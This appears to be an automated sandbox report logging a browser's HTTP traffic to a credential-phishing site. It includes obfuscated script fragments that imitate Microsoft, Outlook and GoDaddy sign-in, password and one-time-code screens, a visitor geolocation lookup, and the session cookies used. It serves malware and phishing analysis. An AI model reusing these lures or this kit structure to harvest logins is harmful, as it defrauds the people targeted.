                                                          2024-08-27 22:11:11 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 5c 78 32 30 75 6e 73 65 74 3b 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 5c 78 32 30 65 72 72 6f 72 27 2c 27 65 72 72 6f 72 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 6f 72 70 68 6f 6e 65 5f 6c 69 76 65 27 2c 27 75 73 65 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 69 6e 70 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 6f 72 70 68 6f 6e 65 5f 6c 69 76 65 27 2c 27 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 69 6e 6b 5c 78 32 30 6d 62 2d 31 36 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 2e 62 61 63 6b 27 2c 27 53 65 6e 64 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 6d 79 5c 78 32 30 4d 69 63 72 6f 73 6f 66
                                                          Data Ascii: display:\x20unset;','otp\x20sent\x20error','error_confirmemailorphone_live','useAuthenticator','inp_confirmemailorphone_live','<a\x20class=\x22link\x20mb-16\x22\x20href=\x22#\x22\x20data-id=\x22','.back','Send\x20another\x20request\x20to\x20my\x20Microsof
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 63 6f 6d 70 6c 65 74 65 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70 70 27 2c 27 73 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 62 6c 6f 63 6b 65 64 27 2c 27 70 77 64 27 2c 27 69 50 72 6f 6f 66 45 6d 61 69 6c 45 6e 74 72 79 27 2c 27 45 6e 74 65 72 5c 78 32 30 61 5c 78 32 30 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 64 64 72 65 73 73 2c 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 2c 5c 78 32 30 6f 72 5c 78 32 30 53 6b 79 70 65 5c 78 32 30 6e 61 6d 65 2e 27 2c 27 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 27 2c 27 65 6d 61 69 6c 50 61 72 74 69 61 6c 27 2c 27 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64
                                                          Data Ascii: 0request\x20to\x20complete','approve\x20auth\x20request\x20auth\x20app','sign\x20in\x20blocked','pwd','iProofEmailEntry','Enter\x20a\x20valid\x20email\x20address,\x20phone\x20number,\x20or\x20Skype\x20name.','bottomsection','emailPartial','sections_godadd
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 6e 64 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 6d 79 5c 78 32 30 4f 75 74 6c 6f 6f 6b 5c 78 32 30 6d 6f 62 69 6c 65 5c 78 32 30 61 70 70 27 2c 27 69 63 6c 6f 75 64 2e 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 73 65 63 74 69 6f 6e 73 5f 27 2c 27 65 72 72 6f 72 5c 78 32 30 6c 69 76 65 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 65 72 72 6f 72 5f 70 77 64 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 65 72 72 6f 72 5f 76 65 72 69 66 79 65 6d 61 69 6c 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70
                                                          Data Ascii: nd\x20another\x20request\x20to\x20my\x20Outlook\x20mobile\x20app','icloud.','section_multipleaccounts','sections_','error\x20live','aria-live','error_pwd','linkoptionclick(this)','error_verifyemail','setAttribute','approve\x20auth\x20request\x20auth\x20ap
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 32 32 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 6f 74 70 69 6d 67 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 27 2c 27 6c 69 6e 6b 5f 74 65 78 74 27 2c 27 4e 65 78 74 27 2c 27 76 61 6c 69 64 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6f 74 70 27 2c 27 73 72 63 27 2c 27 73 65 6c 65 63 74 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 61 64 66 73 27 2c 27 67 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 62 6c 6f 63 6b 27 2c 27 68 65 61 64 27 2c 27 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 73 27 2c 27 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 27 2c 27 63 68 65 63 6b 61 70 70 68 61 76 69 6e 67 74 72 6f 75 62 6c 65 73 65 63 74 69 6f 6e 27 2c 27 69 64 70 44 65 73 63 72 69 70 74 69 6f 6e 27 2c 27 45 6e 74 65 72 5c 78 32 30 74 68 65 5c 78 32 30 63 6f 64 65
                                                          Data Ascii: 22\x20data-id=\x22','otpimg','PhoneAppOTP','link_text','Next','valid\x20phone\x20otp','src','selectmultipleaccountadfs','getAttribute','block','head','protectoptions','aria-describedby','checkapphavingtroublesection','idpDescription','Enter\x20the\x20code
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 72 69 66 79 5c 78 32 30 79 6f 75 72 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 27 2c 27 66 61 64 65 6f 75 74 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30 66 6f 72 77 61 72 64 73 27 2c 27 52 65 63 65 69 76 65 64 5c 78 32 30 72 65 73 70 6f 6e 73 65 3a 27 2c 27 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 72 61 64 69 6f 5c 78 32 32 5d 27 2c 27 63 6c 69 63 6b 65 64 27 2c 27 6c 65 6e 67 74 68 27 2c 27 68 69 64 65 2d 74 6f 2d 72 69 67 68 74 5c 78 32 30 27 2c 27 63 61 6e 74 41 63 63 65 73 73 41 63 63 6f 75 6e 74 27 2c 27 23 6d 61 69 6e 4c 6f 61 64 65 72 27 2c 27 61 75 74 68 27 2c 27 69 50 72 6f 6f 66 50 68 6f 6e 65 48 69 6e 74 27 2c 27 73 70 61 6e 27 2c 27 61 75 74 6f 27 2c 27 43 6f 64 65 27 2c 27 65 72 72 6f 72 5f 75 6e 61 6d 65 27 2c 27 70 68 63 6f
                                                          Data Ascii: rify\x20your\x20phone\x20number','fadeoutform\x201s\x20forwards','Received\x20response:','input[type=\x22radio\x22]','clicked','length','hide-to-right\x20','cantAccessAccount','#mainLoader','auth','iProofPhoneHint','span','auto','Code','error_uname','phco
                                                          2024-08-27 22:11:11 UTC1369INData Raw: 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 6e 6f 52 69 67 68 74 42 6f 72 64 65 72 5c 78 32 32 5c 78 32 30 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 5c 78 32 32 6f 66 66 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6d 61 78 6c 65 6e 67 74 68 3d 5c 78 32 32 31 31 33 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 45 6d 61 69 6c 5c 78 32 30 6e 61 6d 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66
                                                          Data Ascii: -control\x20noRightBorder\x22\x20autocomplete=\x22off\x22\x20type=\x22email\x22\x20id=\x22iProofEmail\x22\x20name=\x22iProofEmail\x22\x20maxlength=\x22113\x22\x20aria-required=\x22true\x22\x20aria-label=\x22Email\x20name\x22\x20aria-describedby=\x22iProof


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.449845188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1501OUTGET /wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC642INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Disposition: inline; filename="wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AGVoifJm3IHjdA1vmPlaNNO5i%2BhO7AWMS6azbSRmva6AH2%2FQJFrCeTd6Kskf9SRqNKAMT6FjpWpXgYL8%2B6tJMg9ST3oRDwXUqoLuAa%2Ftde%2BRE3yaWAWAHQTUQ5bBRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655ad8ce426d-EWR
                                                          2024-08-27 22:11:11 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.449844172.67.70.2334431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC597OUTGET /v1/ip/geo.json HTTP/1.1
                                                          Host: get.geojs.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:11 UTC915INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-request-id: 48747fbf2ed4020bcad8e67573321fd0-ASH
                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                          access-control-allow-origin: *
                                                          access-control-allow-methods: GET
                                                          pragma: no-cache
                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          geojs-backend: ash-01
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fz2REJkhdIMeh87lF7egg3aJTdhf%2FsFQPHXYqYXMfA3j1hc8sTLnNTtBqAMIxFt%2BahYALYiR6NZRq2o%2FryPwzdoamrQnd1nZlFbRi5F05pFzOSLFrtcRYHgl%2BAW%2BMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Content-Type-Options: nosniff
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655af85d43dd-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:11:11 UTC332INData Raw: 31 34 35 0d 0a 7b 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 38 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65
                                                          Data Ascii: 145{"area_code":"0","country_code":"US","country_code3":"USA","continent_code":"NA","asn":3356,"region":"New York","latitude":"40.7123","longitude":"-74.0068","ip":"8.46.123.33","organization_name":"LEVEL3","organization":"AS3356 LEVEL3","timezone":"Ame
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.449846188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1101OUTGET /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC579INHTTP/1.1 404 Not Found
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lm9UcMp9dJB3hFYO%2FGnnyiFDjvAPI%2Finfh1SgxU0wFgstOLNZ1tiduxrT78XsIlcVJ%2BTqjpztrSO4thClphqyCKNj540B5RtgWNmcYbBEBrL1Gm00Nu5EFEO6FWKpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655b1eb27d18-EWR
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.449847188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1517OUTGET /opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC658INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 727
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLFKxir71WqA7m9ckGHySwTD1JJGHvYYBT9h0bXJSVTdba5hJbGrH1Oq1HdRQWQlgltUMu%2FFZmwECxRQ8PFGrj%2F5w%2FU7pfWQ%2Bvw9qvcQj4p9MQ97RbfsCJLdBM%2FFWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655af988420d-EWR
                                                          2024-08-27 22:11:11 UTC711INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                          Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                          2024-08-27 22:11:11 UTC16INData Raw: 66 f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: fSIENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.44984113.33.187.684431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC609OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                          Host: ok4static.oktacdn.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:11 UTC685INHTTP/1.1 200 OK
                                                          Content-Type: image/png
                                                          Content-Length: 10796
                                                          Connection: close
                                                          Date: Sun, 11 Aug 2024 10:26:55 GMT
                                                          Server: nginx
                                                          Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                          ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                          Expires: Mon, 11 Aug 2025 10:26:55 GMT
                                                          Cache-Control: max-age=31536000
                                                          Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                          Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                          Access-Control-Allow-Origin: *
                                                          Accept-Ranges: bytes
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 ad82d8a80f2c6497aad660c7722475c0.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: FRA60-P9
                                                          X-Amz-Cf-Id: wV5dMeR7KtoIa1Azmmxcu__UqzHZndh1xvkiYWyE5gmYILNtCDJ-sw==
                                                          Age: 1424656
